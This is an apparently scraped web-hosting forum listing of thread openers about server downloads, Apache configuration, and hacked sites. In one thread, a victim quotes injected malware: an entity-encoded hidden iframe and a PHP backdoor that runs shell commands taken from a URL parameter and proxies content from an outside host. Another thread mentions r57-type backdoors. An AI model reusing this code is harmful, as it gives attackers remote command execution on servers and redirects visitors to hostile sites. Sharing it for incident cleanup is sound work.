To Web Hosts --> Server Downloading HTML Files

Jan 6, 2007

Has anybody ever come across a server problem, where the file is visited (e.g. domain.com/sub/file.html or domain.com/sub/file2.php) it attempts to download the file automatically as apposed to displaying the page?

See image after I visited a page!

View 4 Replies


ADVERTISEMENT

Downloading Files From Hosting Server

Dec 22, 2007

I was asked to redesign one web site. Nothing much complicated. I've got username and pass to hosting provider. Now I can see the files of web site that are already there but how can I download them because only upload seems to be possible. And if so why is that so?

View 6 Replies View Related

Downloading Files From My Site/server Faster

Dec 22, 2008

Ive been recieving some complaints/feedback that the download speed on my site is too slow.

I test it myself and at night i download at about 60k/s, late at night, mornings its around 300kb/s

Im guessing my site is basically getting high traffic and load issues in the evenings.

(average daily bandwidth is around 200-300gb)

So basically i need to rectify this pronto.

What are the possible solutions?

i thought if i bought a second cheaper server that could step in when the load gets too much for my primary server this could help out the speeds.

Am i correct, are there cheaper ways of speeding things up?

View 10 Replies View Related

Make Downloading Files From My Site/server Faster

Dec 22, 2008

Ive been recieving some complaints/feedback that the download speed on my site is too slow.

I test it myself and at night i download at about 60k/s, late at night, mornings its around 300kb/s

Im guessing my site is basically getting high traffic and load issues in the evenings. (average daily bandwidth is around 200-300gb)

So basically i need to rectify this pronto.

What are the possible solutions?

i thought if i bought a second cheaper server that could step in when the load gets too much for my primary server this could help out the speeds.

Am i correct, are there cheaper ways of speeding things up?

View 14 Replies View Related

How To Limit Html Parsing To .htm, .html Files Only

Jan 10, 2007

My webserver treat ALL files with html tags inside as html files, e.g. text files or EVEN files without extension.

How to only allow .htm, .html files?

I've deactivated temporary mime magic, I also tried with some RemoveHandler, AddType lines but nothing

View 9 Replies View Related

Files Not Downloading To Users

Feb 6, 2008

I run a download website boasting many files (entirely legal, non-pornographic), the sizes of which range from 100KB to 500MB. Some users of the site seem to be complaining of the files not downloading and or being truncated (i.e: it says it has been downloaded even though it has not been fully downloaded.)

Here is one reply I received:

"No specific massage appears, only sign the download is complete and infact it is not. About 7 mega down loaded instead of 79 mega. I use fire fox browser and ADSL internet line speed 512"

All the files however do seem to download perfectly on my computer, though I have a good 8mb line, which leads me to believe it may be something to do with a timeout setting?

View 4 Replies View Related

How To Allow Only One Ip Downloading Files From A Directory At A Time.

Oct 19, 2007

if it is possible to allow only one ip downloading files from a directory at a time.web server is apache , may be with some apache module or if there is some build in configuration can be applied to .htaccess .

View 1 Replies View Related

Path To Code Files On Hosts Server

May 29, 2009

I have just FTP'd my code files onto my hosts server and i'm not sure whether i need the files in the root of the htdocs folder or whether i can leave them in my folder called website within htdocs...? the structure looks like this atm: htdocs->website->[all of my php files]

also... do i need an index.html file or is index.php ok? atm i am getting a 403 error when i try to connect,

View 5 Replies View Related

File Size (content Length) Not Showing When Downloading Files

Jun 30, 2009

When I download a file from my server, only specific extensions are working. This is really annoying since I want to be able to see how much time left to finish a download.

For example I uploaded a video with .vob extension
file.vob --> does not show filesize when downloading

If I rename the same file to different extension:
file.avi --> works fine shows filesize when downloading
file.mp3 --> works fine shows filesize when downloading
file.rar --> works fine shows filesize when downloading
file.mp4 --> does not show filesize when downloading
file.wmv --> does not show filesize when downloading

These are direct download links, not using any download scripts or anything. Why are some extensions displaying the filesize and some not displaying them? I am using Apache 2.x server.

View 2 Replies View Related

Freebsd + Script Adding Virus To Htm/html Files

Mar 2, 2008

my friends server has something running that i couldn't find in cron or through access logs.. it is running comus and arrowtrader.. they're porn trading scripts.. anyway.

it's basically executing something at unknown times which i just started logging cause i temporarily moved "find" to /root and made /usr/bin/find echo me the output.. so it's running these:

---

find /etc
find /var
find /usr/local
find
find ./
find ../
find ../../

---

i can't find what is causing this.. i've disabled comus and arrowtrader but they still run, i can't find anything else running in the background that is causing this..

what i'd really like to know is how to make a wrapper for perl to log all commands.. or some kind of exec logging for freebsd, i've looked for a way to also log all commands run by PHP too but i can never find something like that. i've scanned the server, found the r57/rst type backdoors, removed... nothing is listening on a port, i just can't seem to find it, i've enabled accounting and see that find runs, grep runs too.. but can't see what is causing it..

View 3 Replies View Related

Hacker Adds Malicious Code To All Html And Php Files

Apr 30, 2009

we have been having a strange hacking problem on our server that we can not seem to find how they are managing to accompish. I am just wondering if anyone here may be able to offer any suggestions on this?

The problem:

On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are seperate and do not share login information. This is the 2nd time this has happened within the past two weeks.

Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.

On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.

We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.

What we have done to attempt to secure the server:
1) We have installed SuPhp.

2) We have ensured that all scripts on the affected websites are updated and running the latest versions.

3) We have changed all the passwords.

Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.

The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.

One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.

Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerabilty?

[url]

View 14 Replies View Related

Transferring Files Between Servers/hosts Using SSH

Oct 27, 2008

How can I transfer large files between servers/hosts using SSH?

and is there a way to transfer all the files accessable through a FTP account on a host to another host using SSH? if there is how can I do that?

View 12 Replies View Related

Downloading On A Server

Apr 11, 2007

I have no download possibility on some computers from where I access internet, but I frequently need it.

Can I download files from the internet resource sites directly to a hosting server (just like on a PC)? Can I do it with SSH? What are minimum requirements? SSH on a shared hosting? VPS with root acces?

View 10 Replies View Related

1&1 Ded Server Downloading

Mar 23, 2007

This is my 2nd server,i had a server with leaseweb and no probs wat so ever setting up utorrent on it.

Ive set it up on my 1%1 server but nothing is moving,ive tried random ports,ive tried turning the cisco firewall of on the 1&1 web page control pannel,but nothing moves wat so ever.

What have i missed here,theres no way they can block all ports...it says on there site all ports are avilible,but even if i picked a random port,and wasnt connectable it would still download just slow,any1 else with a 1&1 server had downloading probs with utorrnte.

View 0 Replies View Related

Downloading A File Off Of A Server

Dec 8, 2007

I have a file in the directory of /backup I want to download a file from that directory to my PC, how would I do this.

View 5 Replies View Related

Static Index.html Pages Hacked, Also Index Files

Sep 8, 2007

My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.

I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).

Going back on track, all files named "%index%" were hacked.

-I found a index.txt file with links to obscure sites.

The code was written at bottom of the all index.html files: iframe code

Code:
><!-- ~ --><iframe src="&#104&#116&#116&#112&#58&#47&#47&#103&#111&#111&#103&#108&#101&#116&#114&#97&#102&#102&#46&#99&#111&#109&#47&#105&#110&#46&#99&#103&#105&#63&#100&#101&#102&#97&#117&#108&#116" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code

PHP Code:

<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

");$wr = 0;while(!feof($socket)){  $temp = fgets($socket);    if(eregi("<",$temp)) {      $wr = 1;        }                      if($wr) {              $page .= $temp;                }                }                fclose($socket);                                return $page;                }                                ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...

View 5 Replies View Related

Plesk 12.x / Windows :: All Web Hosts Which Using Asp Or Aspx Files Not Working Anymore

Jun 21, 2014

after upgrading from 11.5. to 12.0.18 all web Hosts which are using asp or aspx files are not working anymore.

We get following error:
HTTP-Fehler 404.17 - Not Found
ModulStaticFileModule
BenachrichtigungExecuteRequestHandler
HandlerStaticFile
Fehlercode0x80070032
Angeforderte URLhttp://www.ratg.at:80/index.asp
Physikalischer PfadC:Inetpubvhosts
atg.athttpdocsindex.asp
AnmeldemethodeAnonym
Angemeldeter BenutzerAnonym

If we try to repair the Installation with the reconfigurator "Plesk virtual Hosts Security" the program is crashing.

View 5 Replies View Related

How To Setup The Apache Server To Allow Http Downloading

Sep 22, 2009

I installed apache, mysql, php on my windows vista laptop, and want to test http downloading. This means when selecting a file (for example, contact.php) from a page, and then click download, it will be downloaded to my desktop.

Do we need to install any other softwares to do that?

View 10 Replies View Related

Postinfo.html Web Server Virus

Sep 12, 2007

I am new here. I have a leased web server and I am getting new pages called "postinfo.html" on every domain along with some javascript code (virus) attached at the end of every webpage on every domain. Does anyone know about this or how to get rid of it and prevent it? I have a sneaky suspicion that it is from a phpbb forum.

View 6 Replies View Related

Why Html File Isn't Uploading On My Server

May 17, 2007

I have a Dating Portal >>> Dating Sites but HTML file isn't uploading on my server "site5.com" Except HTML file every file is uploading there but HTML isn't

View 2 Replies View Related

Apache :: Server Not Serving HTML

Mar 18, 2014

On a newly installed 2.4 on a fresh Gentoo, I created the following test index.html file

View 3 Replies View Related

Universal Hosts (uni-hosts) Two Week Mini Review

Apr 2, 2008

I was in the market for a new dedicated server after a couple of years with my previous provider. The previous provider did nothing wrong but they were no longer competitive when it came to CPU and memory.

I moved first to geekrack. And I left them after a week and a half as they never were able to get my rDNS records setup.

I found Universal Hosts on this forum and gave them a shot. I had asked for an operating system that they didn't offer normally (Debian 64 bit) and they said that they could do it. However, when my server was setup it was 32 bit Debian instead. They apologized and had Debian 64 bit setup less than 24 hours later.

When I asked them to get rDNS records setup it took a few hours but they were setup correctly and they worked.

Universal Hosts is also a BurstNet reseller but compared to my other attempt at using a BurstNet reseller they are fantastic. While the initial config was incorrect they worked quickly to fix it and were very professional about it.

So after two weeks - so far so good. Keep up the good work UniHosts!

View 1 Replies View Related

Apache :: Virtual Hosts With Windows 8 Hosts File

Aug 11, 2013

I am running Apache2.2, PHP5.I have been running with virtual hosts on a Windows 7 environment fine for a couple of years successfully, but have just had to move to a Windows 8 environment.It looks like Apache and PHP have installed and are working fine, but my Virtual hosts are now not being recognised. From what I can tell, it is the Windows 8 hosts file that is having a problem, as it looks as though it is now just setup to Block websites.

If I make the host file just have the one line127.0.0.1 localhost entry, then the very first Virtual Host from my apache config file will come up, but the rest are not found.If I put the usual 127.0.0.1 mywebsite.name aliasname is appears as though my website works momentarily and then is blocked..

View 7 Replies View Related

Downloading And Streaming.... Use's Up The Same Mb?

Oct 13, 2008

I have a friend who we were debating about this.

He says he called up the internet company and upgraded his monthly plan to 60 gig or downloading a month, because he loves watching steaming videos(not youtube) im talking about actual movies.

They told him if he downloaded a 700mb movie or if he watched the exact same movie it would use up 700mb

So according to them downloading or streaming uses the same mb.

I found this hard to believe. But i have no wa of proving it.

What is the answer?

View 8 Replies View Related

VPS For Torrent Downloading

Mar 11, 2009

I would like a VPS so I may download my torrents on the VPS then ftp them home, I am with provider now but got told that's a not allowed to host "those" files.

So is there any one who does not monitor, is dirt cheap etc..

I looked in the offers forum and thought these looked good, bit not too sure if what I want to do is allowed/monitored.

View 14 Replies View Related

Windows VPS & Downloading

Aug 10, 2007

I understand having a Windows VPS service, is just like your Windows on your desktop, except it's on a server.

If so, I know I can download and exceute a Windows program on my desktop, how is downloading and executing done on a Windows VPS server?

View 4 Replies View Related

Ip Address Used For Downloading

Apr 2, 2007

Since I'll get 5 ip addresses for my server, I'm wondering which ip will be used if
my server acts as a download client. Does it pick a random one or a fixed one?

I use winhttp to download stuff from internet.

View 6 Replies View Related

Downloading Speed From My Site

Nov 9, 2008

I have a website on bluehost and i have a major problem in downloading speed from my site. for ex. if you went to any game page on my site "that download the game to play" the download time for the game "flash file" take DOUBLE the normal time.

I am on shared hosting, i know it may be less perfect but not to that level of slowness.

I have no errors in the log file .

When i searched for the server i found it has 1260 web sites.

My site www.samargames.com and you may check for game page.

how to solve the slow of downloading the flash files from my BH account.

View 3 Replies View Related

Downloading Using Browser On Linux

Mar 15, 2008

I'm trying to download this 1 GB file on my Linux server CentOS. But its requiring me to enter a Captcha image which doesn't show up using Elinks or Lynx the two browser I tried.

Wget was my first thing that I tried but that wouldnt work since its impossible to enter the captcha using wget command.

So I need some help how should I download this to my server I'm on Slow DSL connection and it would take weeks to download 1 GB using my desktop and then reuploading it again to server using FTP.

View 3 Replies View Related

Downloading To Plesk In Windows VPS

Aug 11, 2007

On MY Desktop in Plesk 8.1, it shows:

Server Info
Tools
Statistics
Favorites

How/where can I download a windows program?

Do you download to Plesk, like you would to your own Desktop,
or do you upload to Plesk?

View 0 Replies View Related

Alterntive Way For Downloading A MySQL Database

Apr 6, 2007

A friend of mine has an account with a hosting company that recently became unstable and he wants to move his site away.

I downloaded the files, but it now seems impossible to download the databases in the conventional ways.

I tried downloading them using their control panel (vDeck) but I get an error "File Permissions do not allow to download backup".

Then I tried to export it using PHPMyAdmin but the files either doesn't download at all, or it downloads inccomplete with the last lines having something like the following:

Cannot modify header information - headers already sent by (output started at /usr/local/apache/htdocs/phpMyAdmin-2.6.3/export.php:121

I tried to contact their support but they have no clue.

Is there any way to download the database? I thought of creating a script that would manually itterate through the tables and create an export fie similar to what phpMyAdmin creates. I don't know if this is possible, and I hope there are better ways.

View 2 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved